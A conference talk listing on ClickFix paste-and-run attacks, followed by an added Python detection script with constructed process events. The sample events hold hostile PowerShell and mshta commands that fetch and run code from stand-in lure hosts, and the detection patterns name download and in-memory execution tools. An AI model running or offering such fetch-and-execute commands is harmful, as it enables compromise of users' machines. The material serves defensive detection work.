2026 Event
2:35 pm - 3:15 pm, Tuesday, October 13
The Human is the Exploit: How ClickFix Became the Most Abused Initial Access Technique of 2025
About

In 2022, Microsoft blocked VBA macros by default. Attackers spent the next year figuring out what would replace them. What they landed on was simple: show a convincing error message, tell the user to paste a command to fix it, and let them execute it themselves. That is ClickFix. By 2025 it accounted for roughly 47% of observed attacks, surged sharply year over year, and was being used by both cybercrime groups and at least nine nation-state actors.

ClickFix spread the way it did because it is not just a technique, it is an ecosystem. A small developer tier sells builder kits that let operators create convincing lure pages with minimal effort. Those lures have come a long way from simple CAPTCHA prompts and now include full-screen update simulations, browser repair flows, and platform-aware delivery that serves different content depending on the victim's OS. A larger affiliate layer distributes them at scale through phishing, malvertising, and thousands of compromised websites, with traffic distribution systems handling targeting and routing. Payloads are modular: operators mix infostealers, RATs, and ransomware precursors depending on what they are after.

The technique kept evolving too. ConsentFix, for example, steals OAuth tokens through normal browser flows with nothing written to disk, which means MFA does not help and most detection logic is looking in the wrong place. A variant confirmed in early 2026 delivers payloads through DNS response fields, blending with traffic that no one is blocking.

The infrastructure creates overlap that matters for defenders. Traffic distribution systems like TAG-124 have been observed serving both ransomware affiliates and nation-state operations simultaneously. Stolen credentials get reused to compromise more websites, those sites host more campaigns, and the cycle keeps running without much external input.

Detection is harder here than with most techniques because the activity looks like normal user behavior at every step. Key execution happens in places with limited visibility, file reputation is not useful, and infrastructure rotates faster than blocklists. Most EDRs log the activity. Fewer alert on it in time to matter.

We share the detection approaches that have held up across campaigns, along with a practical breakdown of where disruption pays off most. The credential feedback loop is the right place to start. Break that and the infrastructure scaling these campaigns starts running out of fuel.
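One shape the "EDRs log it, few alert on it" gap can take in practice, as an added example that is not code from the talk or its presenters: a small scorer over constructed Windows process-creation events that flags a shell launched straight from the desktop by a user with a command line carrying several paste-and-run traits. It assumes that a command the user pasted into the Run box or a terminal shows up with explorer.exe as the parent, and the indicator patterns and sample events are my own, not from the page.

```python
import re

# Constructed sample process-creation events (illustrative, not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2025-10-13T14:35:02Z", "user": "alice", "parent": "explorer.exe",
     "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://lure.invalid/fix.ps1 | iex"'},
    {"ts": "2025-10-13T14:36:10Z", "user": "bob", "parent": "explorer.exe",
     "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -File C:\\Scripts\\backup.ps1"},
    {"ts": "2025-10-13T14:37:45Z", "user": "svc_build", "parent": "cmd.exe",
     "image": "powershell.exe",
     "cmdline": 'powershell -c "iwr http://artifacts.invalid/pkg | iex"'},
    {"ts": "2025-10-13T14:38:20Z", "user": "carol", "parent": "explorer.exe",
     "image": "mshta.exe",
     "cmdline": "mshta https://lure.invalid/update"},
]

# Assumption: a command pasted by the user into the Run box or a terminal
# surfaces as a shell spawned directly by the desktop shell (explorer.exe).
INTERACTIVE_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line traits typical of paste-and-run payloads; each match is one signal.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("remote_fetch", re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget|downloadstring)\b", re.I)),
    ("in_memory_exec", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("url_in_cmdline", re.compile(r"https?://", re.I)),
]

def score_event(ev):
    """Return the indicator names matched by one event; empty unless it is a shell launched interactively."""
    if ev["image"].lower() not in SHELLS or ev["parent"].lower() not in INTERACTIVE_PARENTS:
        return []
    return [name for name, pat in INDICATORS if pat.search(ev["cmdline"])]

def detect_clickfix(events, min_hits=2):
    """Flag user-launched shells whose command line carries at least min_hits indicators."""
    flagged = []
    for ev in events:
        hits = score_event(ev)
        if len(hits) >= min_hits:
            flagged.append({"ts": ev["ts"], "user": ev["user"], "image": ev["image"], "hits": hits})
    return flagged

if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f["ts"], f["user"], f["image"], ",".join(f["hits"]))
```

The threshold is deliberately a knob: at min_hits=2 the scheduled backup script and the build-service fetch stay quiet, while lowering it to 1 also surfaces the bare mshta-with-URL launch at the cost of more review work.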

InfoSec World